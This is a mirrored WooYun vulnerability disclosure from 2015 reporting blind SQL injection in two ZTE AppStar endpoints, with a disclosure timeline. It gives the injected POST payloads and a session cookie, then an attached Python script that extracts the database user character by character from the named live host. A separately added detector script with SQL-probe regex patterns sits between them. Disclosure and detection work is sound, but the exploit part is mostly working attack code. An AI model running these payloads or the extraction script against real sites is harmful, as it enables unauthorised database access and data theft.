WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles online -------- http://drop.zone.ci/
2015-01-27: Details reported to the vendor; awaiting vendor handling
2015-01-30: Vendor confirmed; details disclosed to the vendor only
2015-02-09: Details disclosed to core white hats and relevant domain experts
2015-02-19: Details disclosed to regular white hats
2015-03-01: Details disclosed to intern white hats
2015-03-13: Details disclosed to the public
ZTE AppStar blind SQL injection (II), with verification script. Two injection points; reviewers, please note the difference from http://www.wooyun.org/bugs/wooyun-2010-094222/ : the injected parameter is different, - - !
1.
URL: http://www.appstar.com.cn/appstar/manage/queryAceAppShow.action
POST: appIndex=0&applimit=7&appType=0 and ascii(MID(version(),1,1))=53&isAce=1&rnd=0.12041312991641462&userType=0
Parameter: appType
2.
URL: http://www.appstar.com.cn/appstar/manage/queryAceTemp.action
POST: appIndex=0&applimit=7&appType=1 and ascii(MID(version(),1,1))=53&isAce=1&rnd=0.46515097096562386&userType=1
Parameter: appType
Cookie:
Hm_lvt_b2d6cc3870d8c6523fc919a188c8c527=1422321865,1422322129,1422322227,1422337215; JSESSIONID=8A2FFF839FD24601AB1F4AC83C8790DB; Hm_lpvt_b2d6cc3870d8c6523fc919a188c8c527=1422350109; www.appstar.com.cn.ace=4d6a41784e5441784d6a63774f5455314d413d3d3a65343562663037653936626138393134303839646630306364393466323462623a31343233353436323739303434
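Both injection points above share the same shape: an integer-typed form field (appType) carrying a boolean condition built from ascii(MID(...)). The following detector is an added example for defenders and is not part of the original report or of the AppStar application; it assumes the endpoint's integer parameters are appIndex, applimit, appType, userType and isAce, and the request records it scans are constructed here, not captured traffic. It raises two independent signals per parameter: a type violation (non-integer value in an integer field), which is the cheapest and most robust check for this endpoint, and a regex for the probe shape (a logical operator followed by a character- or timing-oriented SQL function). The generalisation beyond the page's payload (substr, length, sleep, benchmark) is the common family of boolean- and time-based probes.

```python
"""Detect boolean/time-based blind SQL injection probes in form-encoded POST bodies.

Assumptions (not from the original report): the endpoint's integer
parameters are listed in INTEGER_PARAMS, and SAMPLE_REQUESTS are
constructed (method, path, body) records, not real traffic.
"""
import re
from urllib.parse import parse_qsl

# Parameters the application should only ever receive as integers (assumed).
INTEGER_PARAMS = {"appIndex", "applimit", "appType", "userType", "isAce"}

# Probe shape: a logical operator, then a character/length/timing SQL function call.
PROBE_RE = re.compile(
    r"\b(and|or)\b[\s\S]*?"
    r"\b(ascii|ord|mid|substr|substring|length|char_length|sleep|benchmark)\s*\(",
    re.IGNORECASE,
)
INTEGER_RE = re.compile(r"^-?\d+$")

# Constructed sample requests: two follow the probe shape described on this page,
# one is merely malformed, the rest are benign requests to the same actions.
SAMPLE_REQUESTS = [
    ("POST", "/appstar/manage/queryAceAppShow.action",
     "appIndex=0&applimit=7&appType=0&isAce=1&rnd=0.5&userType=0"),
    ("POST", "/appstar/manage/queryAceAppShow.action",
     "appIndex=0&applimit=7&appType=0+and+ascii%28MID%28version%28%29%2C1%2C1%29%29%3D53"
     "&isAce=1&rnd=0.12&userType=0"),
    ("POST", "/appstar/manage/queryAceTemp.action",
     "appIndex=0&applimit=7&appType=1&isAce=1&rnd=0.46&userType=1"),
    ("POST", "/appstar/manage/queryAceTemp.action",
     "appIndex=0&applimit=7&appType=1+and+ascii%28MID%28version%28%29%2C1%2C1%29%29%3D53"
     "&isAce=1&rnd=0.46&userType=1"),
    ("POST", "/appstar/manage/queryAceAppShow.action",
     "appIndex=7&applimit=7&appType=abc&isAce=1&rnd=0.9&userType=0"),
]

TYPE_VIOLATION = "non-integer value in integer parameter"
PROBE_SHAPE = "boolean/time-based SQL probe shape"


def analyse_body(body):
    """Return a list of (param, reason) findings for one form-encoded body.

    parse_qsl URL-decodes the values, so the regex sees '0 and ascii(MID(...'
    rather than the percent-encoded form on the wire.
    """
    findings = []
    for name, value in parse_qsl(body, keep_blank_values=True):
        if name in INTEGER_PARAMS and not INTEGER_RE.match(value):
            findings.append((name, TYPE_VIOLATION))
        if PROBE_RE.search(value):
            findings.append((name, PROBE_SHAPE))
    return findings


def scan(requests):
    """Return (path, param, reason) for every finding across the POST records."""
    alerts = []
    for method, path, body in requests:
        if method != "POST":
            continue
        for param, reason in analyse_body(body):
            alerts.append((path, param, reason))
    return alerts


if __name__ == "__main__":
    for path, param, reason in scan(SAMPLE_REQUESTS):
        print("%s  param=%s  %s" % (path, param, reason))
```

The type-violation check alone would have flagged both reported requests; the probe-shape regex adds confidence and also catches the same technique applied to a free-text parameter, where no type check is available. A pair of requests to the same path whose only difference is the constant after `=` in such a condition is the classic fingerprint of character-by-character extraction and is worth alerting on at a higher severity.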
[Screenshot: image not included in this copy]
Attached script:
#!/usr/bin/python
# coding: utf_8
# Python 2 script (httplib, raw_input and the print statement are Python 2 only).
import httplib
import time
import urllib
import sys
import random

headers = {
    "Content-type": "application/x-www-form-urlencoded",
    "Accept-Language": "zh-CN,zh;q=0.8",
    "User-Agent": "Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.0)",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Connection": "close",
    "Cache-Control": "no-cache",
}

# Fixed form fields; appType is the injected parameter and is filled in per request.
post_data = {
    "appIndex": "0",
    "applimit": "7",
    "userType": "0",
    "isAce": "1",
    "rnd": "0.12041312991641462",
}

# Candidate characters for each position of the MySQL user() value.
payloads = list("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.")
base_url = "/appstar/manage/queryAceAppShow.action"
user = ""


def sql():
    global post_data
    global user
    cookie = raw_input("pls input your cookie:")
    headers["Cookie"] = cookie
    # One character per position; a true condition is detected by 'CPId'
    # appearing in the response body.
    for i in range(1, 22):
        for payload in payloads:
            getuser = "0 and ASCII(MID(user(),%d,1)) = %s" % (i, ord(payload))
            post_data["appType"] = getuser
            postdata = urllib.urlencode(post_data)
            conn = httplib.HTTPConnection("www.appstar.com.cn", 80, timeout=60)
            conn.request("POST", base_url, postdata, headers)
            html_content = conn.getresponse().read().decode("utf-8")
            conn.close()
            # print html_content
            if html_content.find("CPId") > 0:
                user += payload
                sys.stdout.write("\r[In Progress] " + user)
                sys.stdout.flush()
                break
            else:
                print "WAITING..." + str(random.randint(1, 100))


if __name__ == "__main__":
    sql()
    print "\n[Done] MySQL user is " + user
    print time.strftime("%H:%M:%S", time.localtime())
Severity: High
Vulnerability Rank: 15
Confirmed: 2015-01-30 08:54
Thanks~
None yet